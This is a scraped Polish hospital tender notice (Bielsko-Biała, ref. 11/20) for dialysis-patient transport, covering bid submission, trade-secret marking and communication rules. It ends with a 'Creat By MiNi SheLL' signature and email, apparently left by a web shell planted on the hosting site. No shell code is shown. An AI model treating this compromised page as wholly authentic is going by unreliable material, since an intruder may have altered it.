przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, nie mogąbyć udostępniane innym uczestnikom postępowania, z zastrzeżeniem informacji, o których mowa wart. 86 ust. 4 ustawy pzp. Wykonawca musi wykazać, iż zastrzeżone informacje stanowią tajemnicęprzedsiębiorstwa. 3. Wymagania dotyczące złożenia oferty w formie pisemnej i sposobu jejprzygotowania: 1) Oferta musi być sporządzona w języku polskim, przy uwzględnieniu regulacjizawartych w ustawie z dnia 7 października 1999 r. o języku polskim (t. j. Dz. U. z 2018r. poz. 931 zezm.) i podpisana przez osobę (osoby) upoważnione do reprezentowania Wykonawcy, zgodnie zdokumentem potwierdzającym posiadanie uprawnień do występowania w obrocie prawnym lubudzielonym pełnomocnictwem. 2) Wszelkie poprawki lub zmiany w tekście oferty muszą byćparafowane przez osobę podpisującą ofertę z tym zastrzeżeniem, że naniesienie zmian lub skreśleń wformularzu ofertowym oraz innych formularzach i projekcie umowy, będących załącznikami do siwz,w miejscach do tego nieprzeznaczonych tj., gdy formularz nie przewiduje wyboru (wariantów) lubuzupełnienia (wypełnienia) treści, skutkować będzie odrzuceniem oferty, z zastrzeżeniem zmianwynikających z modyfikacji siwz dokonanej przez Zamawiającego, jeżeli takie występują. 3) Do oferty należy dołączyć oświadczenia, o których mowa w siwz w Rozdziale VIII ust. 2 pkt 2sporządzone, pod rygorem nieważności, w formie pisemnej. 4) Ofertę wraz ze wszystkimiwymaganymi oświadczeniami i dokumentami dołączonymi do oferty, należy umieścić wnieprzezroczystej, zapieczętowanej kopercie, opatrzonej danymi Wykonawcy (pełna nazwa i dokładnyadres Wykonawcy) oraz napisem: Realizacja usług transportowych w zakresie przewozu osóbdializowanych dla Szpitala Wojewódzkiego w Bielsku-Białej – nr referencyjny 11/20 5) Oferty należyzłożyć w siedzibie Zamawiającego tj. Szpital Wojewódzki w Bielsku-Białej, Al. Armii Krajowej 10143-316 Bielsko-Biała (III piętro, pokój 302). 6) Niewłaściwe oznakowanie koperty może byćprzyczyną otwarcia jej przed upływem terminu składania ofert. W takim przypadku oferta zostaniepotraktowana jako oferta handlowa, a nie oferta w rozumieniu ustawy pzp i nie będzie brana poduwagę w chwili otwarcia ofert w niniejszym postępowaniu. W przypadku wysłania koperty kurieremna opakowaniu firmy kurierskiej należy bezwzględnie umieścić informację, że jest to Realizacja usługtransportowych w zakresie przewozu osób dializowanych dla Szpitala Wojewódzkiego w Bielsku-Białej – nr referencyjny 11/20. 7) W przypadku, gdyby oferta zawierała informacje stanowiącetajemnicę przedsiębiorstwa, o których mowa powyżej, Wykonawca winien w sposób nie budzącywątpliwości zastrzec, które z zawartych informacji stanowią tajemnicę przedsiębiorstwa i oznaczyć jeklauzulą: „Dokumenty zastrzeżone – tajemnica przedsiębiorstwa”. Zaleca się wydzielenie tychinformacji w złożonej ofercie. 8) Wykonawca może przed upływem terminu do składania ofertzmienić ofertę. Zmiany złożonej oferty muszą być złożone w miejscu i według zasad obowiązującychprzy składaniu ofert. Kopertę zawierającą zmiany oferty należy dodatkowo opatrzyć dopiskiem„ZMIANA”. 9) Wykonawca może przed upływem terminu do składania ofert wycofać ofertę.Wycofanie złożonej oferty następuje poprzez złożenie pisemnego powiadomienia podpisanego przezosobę (osoby) upoważnione do reprezentowania Wykonawcy, zgodnie z dokumentempotwierdzającym posiadanie uprawnień do występowania w obrocie prawnym lub udzielonympełnomocnictwem złożonym w formie oryginału lub kopii poświadczonej za zgodność z oryginałemprzez notariusza. Powiadomienie należy złożyć w miejscu i według zasad obowiązujących przyskładaniu ofert. Kopertę zawierającą powiadomienie należy dodatkowo opatrzyć dopiskiem„WYCOFANIE”. 10) Zamawiający niezwłocznie zwróci ofertę, która została złożona po terminie.Oferty, które zostaną dostarczone do siedziby zamawiającego w stanie uszkodzonym, wskazującym namożliwość zapoznania się z zawartością nie będą dopuszczone do publicznego otwarcia ofert i zostanąniezwłocznie zwrócone wykonawcy bez rozpatrzenia. 4. Wymagania dotyczące złożenia oferty wpostaci elektronicznej: 1) Wykonawca składa ofertę za pośrednictwem Formularza do złożenia,zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Kluczpubliczny niezbędny do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, naktórym prowadzona będzie korespondencja związana z postępowaniem. 2) Oferta powinna byćsporządzona w języku polskim, z zachowaniem postaci elektronicznej w formacie danych .doc, .docx,.rtf, .odt. .pdf i podpisana kwalifikowanym podpisem elektronicznym. Sposób złożenia oferty, w tymzaszyfrowania oferty opisany został w Regulaminie korzystania z miniPortalu. Ofertę należy złożyć woryginale. 3) Do oferty należy dołączyć oświadczenia, o których mowa w siwz w Rozdziale VIII ust. 2pkt 2 w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, a następnie wrazz plikami stanowiącymi ofertę skompresować do jednego pliku archiwum (ZIP). 4) Wszelkieinformacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. ozwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa,powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznikstanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną częśćskompresowane do jednego pliku archiwum (ZIP). 5) Wykonawca może przed upływem terminu doskładania ofert zmienić lub wycofać ofertę za pośrednictwem Formularza do złożenia, zmiany,wycofania oferty dostępnego na ePUAP i udostępnionych również na miniPortalu. Sposób zmiany iwycofania oferty został opisany w Instrukcji użytkownika dostępnej na miniPortalu. 5. Wykonawca poupływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.SPOSÓB KOMUNIKOWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI ORAZ FORMA, WJAKIEJ OŚWIADCZENIA I DOKUMENTY MUSZĄ BYĆ SKŁADANE (NIE DOTYCZYSKŁADANIA OFERT) 1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzyZamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień orazprzekazywanie informacji odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawyz dnia 23 listopada 2012 r. - Prawo pocztowe (t. j. Dz. U. z 2018r. poz. 2188 ze zm.), zwanej dalej„ustawą – Prawo pocztowe”, osobiście, za pośrednictwem posłańca, faksu lub elektronicznie zapomocą poczty elektronicznej, email przetargi@hospital.com.pl lub pośrednictwem dedykowanegoformularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji).2. Dokumenty lub oświadczenia, wymienione w Rozdziale IX siwz, składane w formie pisemnejmuszą być złożone w oryginale lub w kopii poświadczonej za zgodność z oryginałem, zapośrednictwem operatora pocztowego w rozumieniu ustawy – Prawo pocztowe, osobiście lubpośrednictwem posłańca. Poświadczenie za zgodność z oryginałem następuje przez opatrzenie kopiidokumentu lub kopii oświadczenia sporządzonych w postaci papierowej, własnoręcznym podpisem. 3.Dokumenty lub oświadczenia, wymienione w Rozdziale IX siwz, składane w postaci elektronicznej,muszą być złożone w oryginale w postaci dokumentu elektronicznego lub w elektronicznej kopiidokumentu lub oświadczenia poświadczonej za zgodność z oryginałem. Poświadczenie za zgodność z oryginałem elektronicznej kopii dokumentu lub oświadczenia, następuje przy użyciu kwalifikowanegopodpisu elektronicznego. 4. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lubelektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi wrozporządzeniu Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. w sprawie użycia środkówkomunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania iprzechowywania dokumentów elektronicznych (Dz. U z 2017r. poz. 1320 ze zm.) oraz rozporządzeniuMinistra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądaćzamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U z 2016r. poz. 1126 zezm.). Wnioski o wyjaśnienie treści siwz przekazywane są za pośrednictwem operatora pocztowego wrozumieniu ustawy – Prawo pocztowe, osobiście, za pośrednictwem posłańca, faksu lub przy użyciuśrodków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usługdrogą elektroniczną – na adres e-mail: przetargi@hospital.com.pl, zaleca się aby wnioski, o którychmowa powyżej przekazywane były również w wersji edytowalnych plików. Maksymalny rozmiarplików przesyłanych za pomocą poczty elektronicznej wynosi 10MB. KOMUNIKACJA MIĘDZYZAMAWIAJĄCYM A WYKONAWCAMI - INFORMACJE OGÓLNE 1. Komunikacja międzyZamawiającym a Wykonawcami odbywać się będzie za pośrednictwem operatora pocztowego wrozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (t. j. Dz. U. z 2018r. poz. 2188 zezm.), zwanej dalej „ustawą – Prawo pocztowe”, osobiście, za pośrednictwem posłańca, faksu lub przyużyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. oświadczeniu usług drogą elektroniczną (t. j. Dz. U. z 2019r. poz. 123), a w przypadku złożenia ofertyprzy użyciu miniPortalu https://miniportal.uzp.gov.pl/ , z uwzględnieniem postanowień zawartych wRozdziale XI i XII siwz. 2. Adres korespondencyjny Zamawiającego : Szpital Wojewódzki w Bielsku-Białej, Al. Armii Krajowej 101 43-316 Bielsko-Biała (III piętro, pokój 302), Nr faksu: +48 33 810 2101, e-mail: przetargi@hospital.com.pl. 3. Wykonawca zamierzający złożyć ofertę w postacielektronicznej, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostępdo formularzy: złożenia, zmiany, wycofania oferty. Identyfikator postępowania i klucz publiczny dladanego postępowania o udzielenie zamówienia dostępne są na Liście wszystkich postępowań naminiPortalu oraz stanowi załącznik do niniejszej siwz. 4. Wymagania techniczne i organizacyjnewysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeńoraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania zminiPortalu oraz Regulaminie ePUAP. 5. Maksymalny rozmiar plików przesyłanych za pośrednictwemdedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza dokomunikacji wynosi 150 MB. 6. Zamawiający wyznacza następujące osoby do kontaktu zWykonawcami: Bożena Wiewióra i Agata Polok tel. 033/810 21 60, 77; e-mail: przetargi@hospital.com.pl. 7. Każda ze stron na żądanie drugiej strony niezwłocznie potwierdza faktotrzymania oświadczeń, wniosków, zawiadomień oraz informacji przekazanych faksem lub przyużyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. oświadczeniu usług drogą elektroniczną (t. j. Dz. U. z 2019r. poz. 123). 8. Za datę przekazania oferty,wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopiidokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com